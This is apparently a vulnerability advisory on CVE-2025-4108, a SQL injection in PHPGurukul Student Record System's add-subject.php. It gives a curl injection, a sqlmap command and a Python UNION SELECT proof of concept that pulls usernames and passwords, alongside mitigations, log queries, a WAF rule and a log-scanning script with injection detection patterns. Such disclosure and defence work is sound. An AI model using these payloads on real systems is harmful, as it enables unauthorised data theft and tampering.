PHPGurukul Student Record System, SQL Injection, CVE-2025-4108 (Critical)


How the CVE Works:

CVE-2025-4108 is a critical SQL injection vulnerability in PHPGurukul Student Record System 3.20. The flaw exists in the `sub1` parameter of /add-subject.php, where improper input sanitization allows attackers to inject malicious SQL queries. Since the application does not enforce prepared statements or input validation, an attacker can manipulate database operations remotely. Exploiting this vulnerability may lead to unauthorized data access, modification, or deletion. The attack vector is network-based, requiring no authentication, making it highly exploitable.

DailyCVE Form:

Platform: PHPGurukul SRS
Version: 3.20
Vulnerability: SQL Injection
Severity: Critical
Date: 05/14/2025

What Undercode Say:

Exploitation:

curl -X POST "http://target.com/add-subject.php" --data "sub1=' OR 1=1--"

SQLMAP Command:

sqlmap -u "http://target.com/add-subject.php?sub1=test" --risk=3 --level=5

Mitigation:

1. Patch: Apply vendor updates.

2. Input Sanitization:

$sub1 = mysqli_real_escape_string($conn, $_POST['sub1']);

3. Prepared Statements:

// Bind the value as a string parameter so it is never parsed as SQL
$stmt = $conn->prepare("INSERT INTO subjects (sub1) VALUES (?)");
$stmt->bind_param("s", $_POST['sub1']);
$stmt->execute();

Detection:

SELECT * FROM logs WHERE request LIKE '%add-subject.php%sub1=%';

WAF Rule:

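location = /add-subject.php {
    # "deny" only accepts addresses/CIDRs, so match the query string instead.
    # POST bodies are not inspected here; that needs a WAF module.
    if ($args ~* "('|\"|;|--)") { return 403; }
    # keep the site's usual PHP handler directives in this block
}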

Exploit PoC:

import requests
payload = {"sub1": "' UNION SELECT username, password FROM users--"}
requests.post("http://target.com/add-subject.php", data=payload)

Log Analysis:

grep "POST /add-subject.php" /var/log/apache2/access.log | grep -Ei "union|select"
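
Added example (not from the original post or the vendor's code): the grep above matches only literal keywords, so this Python scan percent-decodes the `sub1` query value on each access-log line before matching, and separately lists POST requests whose body the access log never recorded. It assumes the Apache combined log format; the sample lines, addresses and indicator list are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Combined log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3}'
)
# Constructed indicator list: SQL syntax a plain subject name should not
# contain. Names with apostrophes will match, so tune it against real data.
SQLI_RE = re.compile(r"""['";]|--|/\*|\b(?:union|select|sleep|benchmark)\b""", re.I)

# Constructed sample lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/May/2025:10:01:02 +0000] "GET /add-subject.php?sub1=Mathematics HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/May/2025:10:03:44 +0000] "GET /add-subject.php?sub1=%27%20OR%201%3D1-- HTTP/1.1" 200 498 "-" "curl/8.5.0"',
    '198.51.100.7 - - [14/May/2025:10:03:51 +0000] "POST /add-subject.php HTTP/1.1" 200 498 "-" "curl/8.5.0"',
    '192.0.2.10 - - [14/May/2025:10:05:00 +0000] "GET /index.php?sub1=%27 HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

def scan_access_log(lines, path="/add-subject.php", param="sub1"):
    """Return (hits, body_only_posts) for requests to `path`."""
    hits, body_only_posts = [], []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path_part, _, query = m["target"].partition("?")
        if not path_part.endswith(path):
            continue
        # parse_qs percent-decodes, so %27 or %20UNION are matched in clear.
        values = parse_qs(query, keep_blank_values=True).get(param, [])
        if m["method"] == "POST" and not values:
            # The body is not in the access log; this request cannot be judged here.
            body_only_posts.append((m["ip"], m["ts"]))
        hits += [(m["ip"], m["ts"], v) for v in values if SQLI_RE.search(v)]
    return hits, body_only_posts

if __name__ == "__main__":
    hits, blind = scan_access_log(SAMPLE_LOG)
    for ip, ts, value in hits:
        print(f"suspicious {ip} [{ts}] sub1={value!r}")
    print(f"{len(blind)} POST request(s) with unlogged bodies need body-level logging")
```

Body-only POSTs show up as a blind spot rather than as clean traffic; covering them requires request-body logging or a WAF audit log.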

Backup Command:

mysqldump -u admin -p student_db > backup.sql

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
